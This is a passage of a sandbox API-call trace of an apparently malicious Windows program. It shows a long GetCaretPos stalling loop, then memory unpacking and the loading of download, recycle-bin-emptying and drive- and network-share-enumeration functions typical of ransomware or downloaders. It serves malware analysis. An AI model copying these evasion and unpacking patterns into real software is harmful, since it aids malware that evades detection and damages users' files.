lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.223] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.224] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.225] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.226] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.227] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.228] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.493] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0026.493] LocalAlloc (uFlags=0x0, uBytes=0x8ca0) returned 0x4f26520 [0026.503] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0026.503] VirtualProtect (in: lpAddress=0x4f26520, dwSize=0x8ca0, flNewProtect=0x40, lpflOldProtect=0x18fa98 | out: lpflOldProtect=0x18fa98*=0x4) returned 1 [0026.516] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0026.517] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0026.517] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0026.517] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0026.517] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0026.517] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0026.517] GetProcAddress (hModule=0x76c20000, lpProcName="Module32First") returned 0x76cb5cd9 [0026.517] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0026.517] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0026.519] Module32First (hSnapshot=0x58, lpme=0x18e59c) returned 1 [0026.520] VirtualAlloc (lpAddress=0x0, dwSize=0xe650, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0026.818] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0026.818] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0026.818] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0026.818] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0026.818] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0026.818] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0026.818] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0026.818] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0026.818] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0026.818] SetErrorMode (uMode=0x400) returned 0x0 [0026.819] SetErrorMode (uMode=0x0) returned 0x400 [0026.819] GetVersionExA (in: lpVersionInformation=0x18d4cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18d4cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.819] VirtualAlloc (lpAddress=0x0, dwSize=0xd800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0026.820] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x18e554 | out: lpflOldProtect=0x18e554*=0x2) returned 1 [0026.822] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0026.822] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x75da0000 [0029.396] GetProcAddress (hModule=0x75da0000, lpProcName="URLDownloadToFileA") returned 0x75e368d0 [0029.396] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0029.396] GetProcAddress (hModule=0x75340000, lpProcName="wnsprintfA") returned 0x7536edae [0029.396] GetProcAddress (hModule=0x75340000, lpProcName="StrStrW") returned 0x7534e52d [0029.396] GetProcAddress (hModule=0x75340000, lpProcName="wnsprintfW") returned 0x7536ef87 [0029.396] LoadLibraryA (lpLibFileName="MSVCRT.dll") returned 0x74e10000 [0029.397] GetProcAddress (hModule=0x74e10000, lpProcName="memcpy") returned 0x74e19910 [0029.397] GetProcAddress (hModule=0x74e10000, lpProcName="memset") returned 0x74e19790 [0029.397] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0031.172] GetProcAddress (hModule=0x75fd0000, lpProcName="SHEmptyRecycleBinA") returned 0x7623f003 [0031.172] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74aa0000 [0031.258] GetProcAddress (hModule=0x74aa0000, lpProcName="WNetEnumResourceW") returned 0x74aa3058 [0031.258] GetProcAddress (hModule=0x74aa0000, lpProcName="WNetCloseEnum") returned 0x74aa2dd6 [0031.258] GetProcAddress (hModule=0x74aa0000, lpProcName="WNetOpenEnumW") returned 0x74aa2f06 [0031.258] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0031.258] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0031.258] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDriveStringsW") returned 0x76cb436f [0031.258] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0031.258] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLangID") returned 0x76c4d5fd [0031.258] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0031.258] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpW") returned 0x76c35929 [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0031.259] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0031.259] GetProcAddress 